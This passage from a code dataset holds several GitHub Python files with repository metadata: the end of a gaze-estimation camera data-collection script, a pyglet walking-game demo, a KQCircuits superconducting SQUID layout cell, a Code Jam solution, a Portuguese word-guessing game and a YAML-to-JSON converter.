cell_fill >= self.num**2:\n img = self.background.copy()\n text = 'Out of View'\n font, font_scale, thickness = cv2.FONT_HERSHEY_SIMPLEX, 1, 1\n (label_width, label_height), baseline = cv2.getTextSize(text, font, font_scale, thickness)\n cv2.putText(img, text,(int((img.shape[1] - label_width) / 2), int((img.shape[0] - label_height) / 2)),\n font, 1, (255, 255, 255), 1, cv2.LINE_AA)\n return img, None\n return self.visual_ror(cell_fill)\n\n def visual_por_xy(self, x_hat, y_hat): # point of regard\n img, _ = self.visual_ror_xy(x_hat, y_hat)\n cell_x = int((self.cam_loc[0] - x_hat)*self.ratio)\n cell_y = int((self.cam_loc[1] + y_hat)*self.ratio)\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(img, '.', (cell_x, cell_y), font, 3, (58, 245, 28), 10, cv2.LINE_AA)\n\n return img\n\n def visual_por_xy_finetune(self, g_t, g_h):\n x_t, y_t = g_t\n x_hat, y_hat = g_h\n img, _ = self.visual_ror_xy(x_hat, y_hat)\n cell_x = int((self.cam_loc[0] - x_t)*self.ratio)\n cell_y = int((self.cam_loc[1] + y_t)*self.ratio)\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(img, '.', (cell_x, cell_y), font, 3, (255, 255, 255), 10, cv2.LINE_AA) # White for ground truth\n cell_x = int((self.cam_loc[0] - x_hat) * self.ratio)\n cell_y = int((self.cam_loc[1] + y_hat) * self.ratio)\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(img, '.', (cell_x, cell_y), font, 3, (58, 245, 28), 10, cv2.LINE_AA)\n\n return img\n\n def visual_gt(self, img, g_tx, g_ty): # visual ground truth\n cell_x = int((self.cam_loc[0] - g_tx)*self.ratio)\n cell_y = int((self.cam_loc[1] + g_ty)*self.ratio)\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(img, '.', (cell_x, cell_y), font, 3, (0, 0, 28), 10, cv2.LINE_AA)\n\n return img\n\n\ndef grab_img(cap):\n global THREAD_RUNNING\n global frames\n while THREAD_RUNNING:\n frame = cap.wait_for_frames(timeout_ms=10000) #_, frame = cap.read()\n frame = frame.get_color_frame()\n frame = np.asanyarray(frame.get_data())\n #frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n\n frames.append(frame)\n\ndef collect_data(cap):\n global THREAD_RUNNING\n global frames\n\n virtualboard = board()\n\n calib_data = {'frames': [], 'g_t': []}\n i = 0\n while i < virtualboard.num**2:\n # Start the sub-thread, which is responsible for grabbing images\n frames = []\n THREAD_RUNNING = True\n th = threading.Thread(target=grab_img, args=(cap,))\n th.start()\n img, g_t = virtualboard.visual_ror(i)\n cv2.imshow('image', img)\n key_press = cv2.waitKey(0)\n if key_press == 32: # space\n print(i, g_t)\n THREAD_RUNNING = False\n th.join()\n calib_data['frames'].append(frames)\n calib_data['g_t'].append(g_t)\n i += 1\n elif key_press & 0xFF == ord('q'):\n THREAD_RUNNING = False\n cv2.destroyAllWindows()\n break\n else:\n THREAD_RUNNING = False\n th.join()\n\n return calib_data\n\ndef save_dataset(data):\n name = input('Enter your name: ')\n now = datetime.datetime.now()\n subject = name + '_' + now.strftime(\"%Y-%m-%d %H.%M.%S\")\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('%s_calib.avi' % subject, fourcc, 30.0, (1280, 720))\n target = []\n for idx in range(0, len(data['g_t'])):\n frames = data['frames'][idx]\n g_t = data['g_t'][idx]\n for i in range(len(frames) - 10, len(frames)):\n frame = frames[i]\n target.append(g_t)\n out.write(frame)\n\n out.release()\n fout = open('%s_calib_target.pkl' % subject, 'wb')\n pickle.dump(target, fout)\n fout.close()\n print('saved')\n\nif __name__ == \"__main__\":\n import pyrealsense2 as rs\n from subprocess import call\n pipe = rs.pipeline()\n config = rs.config()\n 
config.enable_stream(rs.stream.color, 1280, 720, rs.format.bgr8, 30)\n profile = pipe.start(config)\n cam_idx = 3\n # adjust these for your camera to get the best accuracy\n call('v4l2-ctl -d /dev/video%d -c brightness=100' % cam_idx, shell=True)\n call('v4l2-ctl -d /dev/video%d -c contrast=50' % cam_idx, shell=True)\n call('v4l2-ctl -d /dev/video%d -c sharpness=100' % cam_idx, shell=True)\n \n data = collect_data(pipe)\n if len(data['g_t']) == 36:\n save_dataset(data)\n \n pipe.stop()\n","repo_name":"linh-gist/GazeEstimationTX2","sub_path":"src/collect_dataset.py","file_name":"collect_dataset.py","file_ext":"py","file_size_in_byte":8146,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"70597649475","text":"import pyglet\nfrom pyglet.window import key\nimport math\nimport resources\n\n# Show bounding boxes\nDEBUG = False\n\nclass Game:\n ''' Main Game Object to handle overall game logic '''\n def __init__(self, window):\n self.window = window\n\n self.main_batch = pyglet.graphics.Batch()\n\n self.create_background()\n self.create_labels()\n self.hero = Hero(start_pos=(40, self.window.height-100),\n window_width=self.window.width, window_height=self.window.height,\n batch=self.main_batch)\n self.window.push_handlers(self)\n self.window.push_handlers(self.hero)\n\n self.enviornment_objs = self.create_enviornment_bounds()\n\n def create_enviornment_bounds(self):\n ''' Create bounding boxes for enviornment background '''\n objs = []\n\n hole = CollisionObject(25, 420, 60, 50, self.window.width, self.window.height)\n top_group1 = CollisionObject(155, 440, 180, 135, self.window.width, self.window.height)\n top_group1_1 = CollisionObject(185, 410, 70, 45, self.window.width, self.window.height)\n top_group2 = CollisionObject(345, 490, 100, 85, self.window.width, self.window.height)\n top_group3 = CollisionObject(415, 450, 150, 85, self.window.width, self.window.height)\n top_group4 = CollisionObject(575, 490, 60, 85, self.window.width, self.window.height)\n top_group5 = CollisionObject(635, 440, 60, 85, self.window.width, self.window.height)\n right_group1 = CollisionObject(700, 50, 60, 385, self.window.width, self.window.height)\n water1 = CollisionObject(0, 240, 535, 75, self.window.width, self.window.height)\n water2 = CollisionObject(460, 100, 75, 145, self.window.width, self.window.height)\n water3 = CollisionObject(460, 0, 75, 35, self.window.width, self.window.height)\n \n objs.append(hole)\n objs.append(top_group1)\n objs.append(top_group1_1)\n objs.append(top_group2)\n objs.append(top_group3)\n objs.append(top_group4)\n objs.append(top_group5)\n objs.append(right_group1)\n objs.append(water1)\n objs.append(water2)\n objs.append(water3)\n\n\n return objs\n\n def create_background(self):\n ''' Create sprite for the background image '''\n self.bg = pyglet.sprite.Sprite(img=resources.background_image, \n batch=self.main_batch,\n x=self.window.width//2, y=self.window.height//2)\n\n def create_labels(self):\n # labels not showing...\n self.title = pyglet.text.Label('Walking Example',\n font_name='Times New Roman',\n font_size=24,\n x=self.window.width//2, y=self.window.height-30,\n anchor_x='center', batch=self.main_batch)\n\n\n pyglet.text.Label('Move with direction keys',\n font_name='Times New Roman',\n font_size=16,\n x=20, y=self.window.height-60,\n batch=self.main_batch)\n\n pyglet.text.Label(\"Move fast with 'f' key\",\n font_name='Times New Roman',\n font_size=16,\n x=20, y=self.window.height-90,\n batch=self.main_batch)\n\n 
def handle_enviornment_collisions(self):\n \"\"\" Detect and handle collisions with hero and enviornment\"\"\"\n for obj in self.enviornment_objs:\n if obj.collides_with(self.hero.hit_box):\n if self.hero.is_moving_up():\n self.hero.hit_box.y -= self.hero.speed\n elif self.hero.is_moving_down():\n self.hero.hit_box.y += self.hero.speed\n elif self.hero.is_moving_left():\n self.hero.hit_box.x += self.hero.speed\n elif self.hero.is_moving_right():\n self.hero.hit_box.x -= self.hero.speed\n else:\n print(\"Unhandled Collision!\")\n\n\n def draw_env_bounds(self):\n ''' Show the environment bounds '''\n for obj in self.enviornment_objs:\n rectangle = pyglet.shapes.Rectangle(obj.x, obj.y, obj.width, obj.height, color=(0, 0, 255))\n rectangle.opacity = 150\n rectangle.draw()\n\n\n def draw(self):\n ''' Main draw method '''\n self.window.clear()\n self.bg.draw() # batch not working for drawing background... have to manually draw\n self.title.draw() # drawing labels is not working...\n self.main_batch.draw()\n\n # DEBUG\n if DEBUG:\n self.draw_env_bounds()\n\n # draw player pos dot\n rectangle = pyglet.shapes.Rectangle(self.hero.hit_box.x, self.hero.hit_box.y, self.hero.hit_box.width, self.hero.hit_box.height, color=(255, 0, 0))\n rectangle.opacity = 125\n rectangle.draw()\n\n\n def update(self, dt):\n self.hero.update(dt)\n self.handle_enviornment_collisions()\n\n def on_key_press(self, symbol, modifiers):\n pass\n\n def on_key_release(self, symbol, modifiers):\n pass\n\nclass HeroImages():\n ''' Image References for Hero Sprite '''\n def __init__(self):\n self.walk_up = pyglet.image.Animation.from_image_sequence(resources.character_seq_walk_up, duration=0.1,loop=True)\n self.walk_down = pyglet.image.Animation.from_image_sequence(resources.character_seq_walk_down, duration=0.1,loop=True)\n self.walk_left = pyglet.image.Animation.from_image_sequence(resources.character_seq_walk_left, duration=0.1,loop=True)\n self.walk_right = pyglet.image.Animation.from_image_sequence(resources.character_seq_walk_right, duration=0.1,loop=True)\n\n self.face_up = resources.character_seq_face_up\n self.face_down = resources.character_seq_face_down\n self.face_left = resources.character_seq_face_left\n self.face_right = resources.character_seq_face_right\n\nclass CollisionObject(object):\n ''' Rectangular collision object\n Used for calculating collisions between objects\n '''\n def __init__(self, x, y, width, height, window_width, window_height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.window_width = window_width\n self.window_height = window_height\n self.position = (self.x, self.y)\n\n def collides_with(self, other_object):\n # rectangle collision\n x1 = self.x\n y1 = self.y\n x2 = other_object.x\n y2 = other_object.y\n\n if (x1 < x2 + other_object.width and\n x1 + self.width > x2 and\n y1 < y2 + other_object.height and\n y1 + self.height > y2):\n return True\n else:\n return False\n\n\nclass PhysicalSpriteObject(pyglet.sprite.Sprite):\n ''' A physical sprite object '''\n def __init__(self, window_width, window_height, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.window_width = window_width\n self.window_height = window_height\n self.velocity_x, self.velocity_y = 0.0, 0.0\n self.hit_box = CollisionObject(self.x, self.y, self.width, self.height, self.window_width, self.window_height)\n\n\nclass Hero(PhysicalSpriteObject):\n ''' Hero Sprite Class '''\n def __init__(self, start_pos=(20, 200), hero_images=HeroImages(), *args, **kwargs):\n 
super().__init__(img=hero_images.face_down, x=start_pos[0], y=start_pos[1], *args, **kwargs)\n self.hero_images = hero_images\n\n # adjust hit box height\n self.hit_box.height -= 55\n \n self.speed = 2\n\n self.character_keys = dict(up=False, down=False, \n left=False, right=False,\n fast=False)\n\n def is_moving_up(self):\n return self.character_keys['up']\n\n def is_moving_down(self):\n return self.character_keys['down']\n\n def is_moving_left(self):\n return self.character_keys['left']\n\n def is_moving_right(self):\n return self.character_keys['right']\n\n def update(self, dt):\n if self.character_keys['fast']:\n self.speed = 4\n else:\n self.speed = 2\n\n if self.is_moving_up():\n if self.image != self.hero_images.walk_up:\n self.image = self.hero_images.walk_up\n self.hit_box.y += self.speed\n elif self.is_moving_down():\n if self.image != self.hero_images.walk_down:\n self.image = self.hero_images.walk_down\n self.hit_box.y -= self.speed\n elif self.is_moving_left():\n if self.image != self.hero_images.walk_left:\n self.image = self.hero_images.walk_left\n self.hit_box.x -= self.speed\n elif self.is_moving_right():\n if self.image != self.hero_images.walk_right:\n self.image = self.hero_images.walk_right\n self.hit_box.x += self.speed\n else:\n # if not moving, set to still image\n if self.image == self.hero_images.walk_up:\n self.image = self.hero_images.face_up\n elif self.image == self.hero_images.walk_down:\n self.image = self.hero_images.face_down\n elif self.image == self.hero_images.walk_left:\n self.image = self.hero_images.face_left\n elif self.image == self.hero_images.walk_right:\n self.image = self.hero_images.face_right\n\n # prevent going out of border\n min_x = 0\n min_y = 0\n max_x = self.window_width\n max_y = self.window_height\n\n if self.hit_box.x < min_x:\n self.hit_box.x = min_x\n elif (self.hit_box.x+self.hit_box.width) > max_x:\n self.hit_box.x = (max_x - self.hit_box.width)\n if self.hit_box.y < min_y:\n self.hit_box.y = min_y\n elif (self.hit_box.y+self.hit_box.height) > max_y:\n self.hit_box.y = (max_y - self.hit_box.height)\n\n self.x = self.hit_box.x\n self.y = self.hit_box.y\n\n def on_key_press(self, symbol, modifiers):\n if symbol == key.UP:\n self.character_keys['up'] = True\n elif symbol == key.DOWN:\n self.character_keys['down'] = True\n elif symbol == key.LEFT:\n self.character_keys['left'] = True\n elif symbol == key.RIGHT:\n self.character_keys['right'] = True\n elif symbol == key.F:\n self.character_keys['fast'] = True\n\n def on_key_release(self, symbol, modifiers):\n if symbol == key.UP:\n self.character_keys['up'] = False\n elif symbol == key.DOWN:\n self.character_keys['down'] = False\n elif symbol == key.LEFT:\n self.character_keys['left'] = False\n elif symbol == key.RIGHT:\n self.character_keys['right'] = False\n elif symbol == key.F:\n self.character_keys['fast'] = False\n\n\nif __name__ == '__main__':\n pass\n \n#window = pyglet.window.Window(1080, 768)\nwindow = pyglet.window.Window(768, 576)\ngame = Game(window)\npyglet.clock.schedule_interval(game.update, 1/120.0)\n\n@window.event\ndef on_draw():\n game.draw()\n\npyglet.app.run()\n\n\n","repo_name":"JayMil/pyglet_games","sub_path":"intro/animation/walking-with-env.py","file_name":"walking-with-env.py","file_ext":"py","file_size_in_byte":11458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7605721102","text":"from math import sqrt\nfrom autologging import logged\nfrom kqcircuits.pya_resolver import pya\nfrom 
kqcircuits.util.parameters import Param, pdt\nfrom kqcircuits.junctions.squid import Squid\nfrom kqcircuits.util.symmetric_polygons import polygon_with_vsym\n\n\n@logged\nclass Manhattan(Squid):\n \"\"\"The PCell declaration for a Manhattan style SQUID.\n\n This SQUID has two distinct sub-types automatically selected by loop-area.\n \"\"\"\n\n finger_overshoot = Param(pdt.TypeDouble, \"Length of fingers after the junction.\", 1.0, unit=\"μm\")\n include_base_metal_gap = Param(pdt.TypeBoolean, \"Include base metal gap layer\", True)\n shadow_margin = Param(pdt.TypeDouble, \"Shadow layer margin near the the pads\", 1.0, unit=\"μm\")\n compact_geometry = Param(pdt.TypeBoolean, \"Compact geometry for metal addition.\", False)\n separate_junctions = Param(pdt.TypeBoolean, \"Junctions to separate layer\", False)\n offset_compensation = Param(pdt.TypeDouble, \"Junction lead offset from junction width\", 0, unit=\"μm\")\n mirror_offset = Param(pdt.TypeBoolean, \"Move the junction lead offset to the other lead\", False)\n finger_overlap = Param(pdt.TypeDouble, \"Length of fingers inside the pads\", 0.2, unit=\"μm\")\n single_junction = Param(pdt.TypeBoolean, \"Disable the second junction\", False)\n\n def build(self):\n self.produce_manhattan_squid(top_pad_layer=\"SIS_junction\")\n\n def produce_manhattan_squid(self, top_pad_layer):\n\n # geometry constants\n big_loop_height = 10\n loop_bottom_y = 1.5\n self.metal_gap_top_y = 20 if self.compact_geometry else 26.5\n self.width = 36 if self.compact_geometry else 38 # total width of junction layer\n self.height = 17 if self.compact_geometry else 20.2 # total height of junction layer\n bp_height = 5 # bottom pad height\n tp_width = 10 # top pad width\n brim_height = 1 # thickness of the \"top-hat's\" brim\n small_loop_height = 5.2\n small_hat_width = 2 # width of the small hat shape, in case of small loop\n\n # corner rounding parameters\n rounding_params = {\n \"rinner\": 0.5, # inner corner rounding radius\n \"router\": 0.5, # outer corner rounding radius\n \"n\": 64, # number of point per rounded corner\n }\n\n # convenience variables\n delta_j = self.loop_area / big_loop_height # junction distance, a.k.a. 
loop width\n tp_height = self.height - loop_bottom_y - big_loop_height # top pad height\n bp_gap_x = -self.width / 2 + (self.width - delta_j) / 2 # bottom gap left edge x-coordinate\n bp_gap_x_min = -self.width / 2 + 7 # fixed at minimum size\n finger_margin = brim_height # make hats brim this much wider for good finger connection\n\n # adjust for small loop geometry\n small_loop = tp_width > -bp_gap_x * 2\n if small_loop:\n bp_gap_x = bp_gap_x_min\n delta_j = self.loop_area / small_loop_height\n\n junction_shapes_top = []\n junction_shapes_bottom = []\n shadow_shapes = []\n\n # create rounded bottom part and top parts\n self.produce_contact_pads(top_pad_layer, bp_height, bp_gap_x, tp_height, tp_width,\n big_loop_height, junction_shapes_bottom, rounding_params,\n shadow_shapes, junction_shapes_top)\n\n # create rectangular junction-support structures and junctions\n if small_loop:\n small_hat = [\n pya.DPoint(-small_hat_width / 2, self.height - tp_height),\n pya.DPoint(-small_hat_width / 2, small_loop_height + loop_bottom_y + brim_height),\n pya.DPoint(-delta_j / 2 - finger_margin, small_loop_height + loop_bottom_y + brim_height),\n pya.DPoint(-delta_j / 2 - finger_margin, small_loop_height + loop_bottom_y)\n ]\n junction_shapes_top.append(polygon_with_vsym(small_hat).to_itype(self.layout.dbu))\n if top_pad_layer != \"SIS_junction\":\n junction_shapes_bottom.append(polygon_with_vsym(small_hat).to_itype(self.layout.dbu))\n small_hat_shadow = [\n small_hat[0] + pya.DPoint(-self.shadow_margin, -self.shadow_margin),\n small_hat[1] + pya.DPoint(-self.shadow_margin, self.shadow_margin),\n small_hat[2] + pya.DPoint(-self.shadow_margin, self.shadow_margin),\n small_hat[3] + pya.DPoint(-self.shadow_margin, -self.shadow_margin),\n ]\n shadow_shapes.append(polygon_with_vsym(small_hat_shadow).to_itype(self.layout.dbu))\n small_hat[3].x += finger_margin\n self._make_junctions(small_hat[3], loop_bottom_y)\n else:\n tp_brim_left = [\n pya.DPoint(-delta_j / 2 - finger_margin, self.height - tp_height + brim_height),\n pya.DPoint(-delta_j / 2 - finger_margin, self.height - tp_height)\n ]\n junction_shapes_top.append(polygon_with_vsym(tp_brim_left).to_itype(self.layout.dbu))\n if top_pad_layer != \"SIS_junction\":\n junction_shapes_bottom.append(polygon_with_vsym(tp_brim_left).to_itype(self.layout.dbu))\n tp_brim_shadow_pts = [\n tp_brim_left[0] + pya.DPoint(-self.shadow_margin, self.shadow_margin),\n tp_brim_left[1] + pya.DPoint(-self.shadow_margin, -self.shadow_margin),\n ]\n shadow_shapes.append(polygon_with_vsym(tp_brim_shadow_pts).to_itype(self.layout.dbu))\n tp_brim_left[1].x += finger_margin\n self._make_junctions(tp_brim_left[1], bp_height, finger_margin)\n\n self._add_shapes(junction_shapes_bottom, \"SIS_junction\")\n self._add_shapes(junction_shapes_top, top_pad_layer)\n self._add_shapes(shadow_shapes, \"SIS_shadow\")\n self._produce_ground_grid_avoidance()\n self._produce_ground_metal_shapes()\n self._add_refpoints()\n\n def produce_contact_pads(self,top_pad_layer, bp_height, bp_gap_x, tp_height,tp_width, big_loop_height,\n junction_shapes_bottom, rounding_params, shadow_shapes, junction_shapes_top):\n\n bp_pts_left = [\n pya.DPoint(-self.width / 2, -0.5),\n pya.DPoint(-self.width / 2, bp_height),\n pya.DPoint(bp_gap_x, bp_height),\n pya.DPoint(bp_gap_x, self.height - tp_height - big_loop_height)\n ]\n bp_shape = polygon_with_vsym(bp_pts_left)\n self._round_corners_and_append(bp_shape, junction_shapes_bottom, rounding_params)\n\n bp_shadow_pts_left = [\n bp_pts_left[0] + 
pya.DPoint(-self.shadow_margin, -self.shadow_margin),\n bp_pts_left[1] + pya.DPoint(-self.shadow_margin, self.shadow_margin),\n bp_pts_left[2] + pya.DPoint(self.shadow_margin, self.shadow_margin),\n bp_pts_left[3] + pya.DPoint(self.shadow_margin, self.shadow_margin),\n ]\n bp_shadow_shape = polygon_with_vsym(bp_shadow_pts_left)\n self._round_corners_and_append(bp_shadow_shape, shadow_shapes, rounding_params)\n\n # create rounded top part\n\n tp_pts_left = [\n pya.DPoint(-tp_width / 2, self.height),\n pya.DPoint(-tp_width / 2, self.height - tp_height),\n ]\n tp_shape = polygon_with_vsym(tp_pts_left)\n self._round_corners_and_append(tp_shape, junction_shapes_top, rounding_params)\n\n # add top pad to bottom shapes in case another layer is used for the upper part of the squid\n\n if top_pad_layer != \"SIS_junction\":\n self._round_corners_and_append(tp_shape, junction_shapes_bottom, rounding_params)\n\n tp_shadow_pts_left = [\n tp_pts_left[0] + pya.DPoint(-self.shadow_margin, self.shadow_margin),\n tp_pts_left[1] + pya.DPoint(-self.shadow_margin, -self.shadow_margin),\n ]\n tp_shadow_shape = polygon_with_vsym(tp_shadow_pts_left)\n self._round_corners_and_append(tp_shadow_shape, shadow_shapes, rounding_params)\n\n def _make_junctions(self, top_corner, b_corner_y, finger_margin=0):\n \"\"\"Create junction fingers and add them to some SIS layer.\n\n Choose 'SIS_junction' layer by default but 'SIS_junction_2' if ``separate_junctions`` is True.\n \"\"\"\n jx = top_corner.x - (top_corner.y - b_corner_y) / 2\n jy = (top_corner.y + b_corner_y) / 2\n ddb = self.junction_width * sqrt(0.5)\n ddt = self.junction_width * sqrt(0.5)\n if self.mirror_offset:\n ddt += self.offset_compensation * sqrt(0.5)\n else:\n ddb += self.offset_compensation * sqrt(0.5)\n fo = self.finger_overshoot * sqrt(0.5)\n pl = self.finger_overlap * sqrt(0.5) # plus length to connect despite of rounding\n\n def finger_points(size):\n return [\n pya.DPoint(top_corner.x + pl, top_corner.y + size + pl),\n pya.DPoint(top_corner.x + size + pl, top_corner.y + pl),\n pya.DPoint(jx - fo, jy - fo - size),\n pya.DPoint(jx - fo - size, jy - fo),\n ]\n\n finger_bottom = pya.DTrans(-jx, -jy) * pya.DPolygon(finger_points(ddb))\n finger_top = pya.DTrans(-jx, -jy) * pya.DPolygon(finger_points(ddt))\n\n squa = sqrt(2) / 2\n if self.single_junction:\n junction_shapes = [\n (pya.DTrans(jx - finger_margin, jy) * finger_top).to_itype(self.layout.dbu),\n (pya.DTrans(3, False, jx - finger_margin, jy) * finger_bottom).to_itype(self.layout.dbu),\n ]\n # place refpoints at the middle of the junction. 
In this case, \"l\" and \"r\" coincide.\n self.refpoints[\"l\"] = pya.DPoint(jx - fo - finger_margin + self.finger_overshoot * squa,\n jy - fo + self.finger_overshoot * squa)\n self.refpoints[\"r\"] = self.refpoints[\"l\"]\n else:\n junction_shapes = [\n (pya.DTrans(jx - finger_margin, jy) * finger_top).to_itype(self.layout.dbu),\n (pya.DTrans(0, False, jx - 2 * top_corner.x, jy) * finger_top).to_itype(self.layout.dbu),\n (pya.DTrans(3, False, jx - finger_margin, jy) * finger_bottom).to_itype(self.layout.dbu),\n (pya.DTrans(3, False, jx - 2 * top_corner.x, jy) * finger_bottom).to_itype(self.layout.dbu)\n ]\n # place refpoints at the middle of the left and right junctions\n self.refpoints[\"l\"] = pya.DPoint(jx - fo - finger_margin + self.finger_overshoot * squa,\n jy - fo + self.finger_overshoot * squa)\n self.refpoints[\"r\"] = pya.DPoint(jx - fo - 2 * top_corner.x + self.finger_overshoot * squa,\n jy - fo + self.finger_overshoot * squa)\n\n junction_region = pya.Region(junction_shapes).merged()\n layer_name = \"SIS_junction_2\" if self.separate_junctions else \"SIS_junction\"\n self.cell.shapes(self.get_layer(layer_name)).insert(junction_region)\n\n def _add_shapes(self, shapes, layer):\n \"\"\"Merge shapes into a region and add it to layer.\"\"\"\n region = pya.Region(shapes).merged()\n self.cell.shapes(self.get_layer(layer)).insert(region)\n\n def _add_refpoints(self):\n \"\"\"Adds the \"origin_squid\" refpoint and port \"common\".\"\"\"\n self.refpoints[\"origin_squid\"] = pya.DPoint(0, 0)\n self.add_port(\"common\", pya.DPoint(0, self.metal_gap_top_y))\n\n def _produce_ground_metal_shapes(self):\n \"\"\"Produces hardcoded shapes in metal gap and metal addition layers.\"\"\"\n # metal additions bottom\n x0 = -12 if self.compact_geometry else -13\n y0 = -1\n bottom_pts = [\n pya.DPoint(x0 - 3, y0 - 1),\n pya.DPoint(x0 - 3, y0 + 2),\n pya.DPoint(x0 - 5, y0 + 2),\n pya.DPoint(x0 - 5, y0 + 5),\n pya.DPoint(x0, y0 + 5),\n pya.DPoint(x0, y0 + 1)\n ]\n shape = polygon_with_vsym(bottom_pts)\n self.cell.shapes(self.get_layer(\"base_metal_addition\")).insert(shape)\n # metal additions top\n y0 = 12 if self.compact_geometry else 14.5\n top_pts = [\n pya.DPoint(-2, y0 + 3),\n pya.DPoint(-2, y0 + 1),\n pya.DPoint(-1, y0 + 1),\n pya.DPoint(-1, y0),\n pya.DPoint(-4, y0),\n pya.DPoint(-4, self.metal_gap_top_y),\n ]\n shape = polygon_with_vsym(top_pts)\n self.cell.shapes(self.get_layer(\"base_metal_addition\")).insert(shape)\n # metal gap\n if self.include_base_metal_gap:\n pts = bottom_pts[::-1] + [pya.DPoint(-20.5, -2), pya.DPoint(-20.5, self.metal_gap_top_y)] + top_pts[::-1]\n shape = polygon_with_vsym(pts)\n self.cell.shapes(self.get_layer(\"base_metal_gap_wo_grid\")).insert(shape)\n\n def _produce_ground_grid_avoidance(self):\n \"\"\"Add ground grid avoidance.\"\"\"\n w = self.cell.dbbox().width()\n h = self.cell.dbbox().height()\n protection = pya.DBox(-w / 2 - self.margin, -2 - self.margin, w / 2 + self.margin, h - 2 + self.margin)\n self.cell.shapes(self.get_layer(\"ground_grid_avoidance\")).insert(protection)\n\n def _round_corners_and_append(self, polygon, polygon_list, rounding_params):\n \"\"\"Rounds the corners of the polygon, converts it to integer coordinates, and adds it to the polygon list.\"\"\"\n polygon = polygon.round_corners(rounding_params[\"rinner\"], rounding_params[\"router\"], rounding_params[\"n\"])\n 
polygon_list.append(polygon.to_itype(self.layout.dbu))\n","repo_name":"iqm-finland/KQCircuits","sub_path":"klayout_package/python/kqcircuits/junctions/manhattan.py","file_name":"manhattan.py","file_ext":"py","file_size_in_byte":13563,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"61"}
{"seq_id":"23442098111","text":"import sys\n\n# def bitWiseAnd(str1, str2):\n# \tdiff = len(str1) - len(str2)\n# \tif diff > 0:\n# \t\tstr1\ndef howManyWays(A, B, K):\n\tways = 0\n\tfor i in range(0, A):\n\t\tfor j in range(0, B):\n\t\t\tbit = i&j\n\t\t\tif bit < K and bit > -1:\n\t\t\t\tways += 1\n\treturn ways\n\ninfile = sys.argv[1]\noutfile = sys.argv[2]\n\ninf = open(infile)\noutf = open(outfile, 'w')\nnumTestCases = int(inf.readline())\n\nfor testcase in range(1, numTestCases+1):\n\tread = inf.readline().split()\n\tA = int(read[0])\n\tB = int(read[1])\n\tK = int(read[2])\n\toutf.write('Case #'+str(testcase)+': '+str(howManyWays(A, B, K))+'\\n')","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_143/428.py","file_name":"428.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"31879414865","text":"################################################ GAME ACERTE A PALAVRA ################################################\nsecreto = 'perfume'\ndigitadas = []\nchances = 3\n\n\nprint('Você tem 3 chances de acertar a palavra correta.\\n')\n\n\nprint('#' * 60)\nwhile True:\n    letra = input('Digite uma letra: ')\n    print()\n    \n    if len(letra) > 1:\n        print('Ahhh isso não vale, digite apenas uma letra.')\n        continue\n    digitadas.append(letra)\n    \n    \n    if letra in secreto:\n        print(f'Uhuuuuu, a letra \"{letra}\" existe na palavra secreta.\\n')\n        \n    else:\n        print(f'Afffzzzz: a letra \"{letra}\" NÃO EXISTE na palavra secreta.\\n')\n        \n        digitadas.pop()\n    \n    \n    secreto_temp = ''\n    for letra_secreta in secreto:\n        if letra_secreta in digitadas:\n            secreto_temp += letra_secreta\n        else:\n            secreto_temp += '*'\n    \n    if secreto_temp == secreto:\n        print(f'Parabéns, VOCÊ GANHOU O JOGO!!! A palavra era {secreto_temp}.\\n')\n        break\n    else:\n        print(f'A palavra secreta está assim: {secreto_temp}\\n')\n    \n    \n    if letra not in secreto:\n        chances -= 1\n        print(f'Você ainda tem {chances} chances.\\n')\n    \n    print('#' * 60)\n    \n    if chances == 0:\n        print('Você PERDEU, Acabou suas chances. :(')\n        break","repo_name":"Ediiney/Jogo-Acerte-a-Palavra","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"32030415383","text":"#!/usr/bin/env python3\n\nimport yaml\nimport json\n\nfh = open(\"test.yaml\", \"r\", encoding=\"utf-8\")\ntext = fh.read()\ndata = yaml.load(text, Loader=yaml.FullLoader)\n\nprint(\"YAML Dump:\")\nprint(yaml.dump(data, sort_keys=False)) # see more: help(yaml.Dumper)\n\n# refer to https://stackoverflow.com/questions/53757981/converting-yaml-to-jsontypeerror-object-of-type-date-is-not-json-serializabl\nimport datetime\ndef DateEncoder(obj):\n    if isinstance(obj, (datetime.datetime, datetime.date)):\n        return obj.strftime('%Y-%m-%d')\n\nprint(\"JSON Dump:\")\nprint(json.dumps(data, indent=4, default=DateEncoder))\n\n","repo_name":"xzhong86/MyLangLib","sub_path":"python/t10-yaml-json.py","file_name":"t10-yaml-json.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
